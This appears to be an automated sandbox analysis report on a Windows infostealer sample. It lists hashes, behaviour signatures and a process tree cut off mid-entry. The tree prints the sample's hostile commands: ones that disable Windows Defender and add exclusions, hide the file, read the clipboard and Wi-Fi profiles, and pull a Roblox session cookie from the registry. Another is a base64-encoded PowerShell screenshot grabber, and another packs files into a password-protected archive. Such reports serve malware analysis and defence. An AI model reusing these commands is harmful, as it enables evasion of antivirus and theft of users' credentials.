Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 03:21

General

  • Target

    702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe

  • Size

    7.6MB

  • MD5

    8c18db30b27feae03c4850c661ff65b0

  • SHA1

    9f5623ddaf12cd9606b1a163840d729c26f6554e

  • SHA256

    702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6

  • SHA512

    c80e6d8d2a58fb291f1d31dabcc1d859326b9a7859e5afc81a6af99e7cad9afc61e4805f84c4ac88a222d2209a31e157cac5cb22dcc8c7b1c473c00eec9b6602

  • SSDEEP

    196608:OYD+kd+wfI9jUCBB7m+mKOY7rXrZusoSDmhfvsbnTNeWM:d5HIHL7HmBYXrYSaUNW

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe
    "C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe
      "C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2472
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you have been ratted all you have left to do is cry and buy a new pc', 0, 'ratted pls just buy a new pc', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('you have been ratted all you have left to do is cry and buy a new pc', 0, 'ratted pls just buy a new pc', 32+16);close()"
          4⤵
            PID:4200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4448
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3900
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5088
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4116
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:1216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:3168
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2432
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3480
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1932
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:1964
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe""
              3⤵
              • Hide Artifacts: Hidden Files and Directories
              • Suspicious use of WriteProcessMemory
              PID:1808
              • C:\Windows\system32\attrib.exe
                attrib +h +s "C:\Users\Admin\AppData\Local\Temp\702c913d808b0314e4d82a0f4d70558ab234befa30a379418b42b8d7e76f3af6.exe"
                4⤵
                • Views/modifies file attributes
                PID:3988
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4128
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1816
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3036
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3588
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4396
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:1584
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:2692
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:636
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2476
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:1748
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                3⤵
                • System Network Configuration Discovery: Wi-Fi Discovery
                PID:2880
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  4⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:2636
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "systeminfo"
                3⤵
                  PID:4924
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo
                    4⤵
                    • Gathers system information
                    PID:1976
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3056
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1704
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:1196
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1076
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dlsbpjyw\dlsbpjyw.cmdline"
                            5⤵
                              PID:556
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC786.tmp" "c:\Users\Admin\AppData\Local\Temp\dlsbpjyw\CSC39CAFAE7B7D84E9DB65E91E75B9C9C15.TMP"
                                6⤵
                                  PID:756
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:3232
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:5080
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:5060
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:4480
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:1616
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:1964
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:1932
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:1140
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:1808
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:4528
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                3⤵
                                                  PID:928
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3484
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  3⤵
                                                    PID:4160
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1628
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                    3⤵
                                                      PID:1112
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        4⤵
                                                          PID:1388
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16322\rar.exe a -r -hp"1018" "C:\Users\Admin\AppData\Local\Temp\hzvZb.zip" *"
                                                        3⤵
                                                          PID:2944
                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI16322\rar.exe
                                                            C:\Users\Admin\AppData\Local\Temp\_MEI16322\rar.exe a -r -hp"1018" "C:\Users\Admin\AppData\Local\Temp\hzvZb.zip" *
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:3672
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          3⤵
                                                            PID:376
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic os get Caption
                                                              4⤵
                                                                PID:2448
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                              3⤵
                                                                PID:1520
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic computersystem get totalphysicalmemory
                                                                  4⤵
                                                                    PID:1076
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                  3⤵
                                                                    PID:776
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic csproduct get uuid
                                                                      4⤵
                                                                        PID:3440
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                      3⤵
                                                                        PID:4552
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
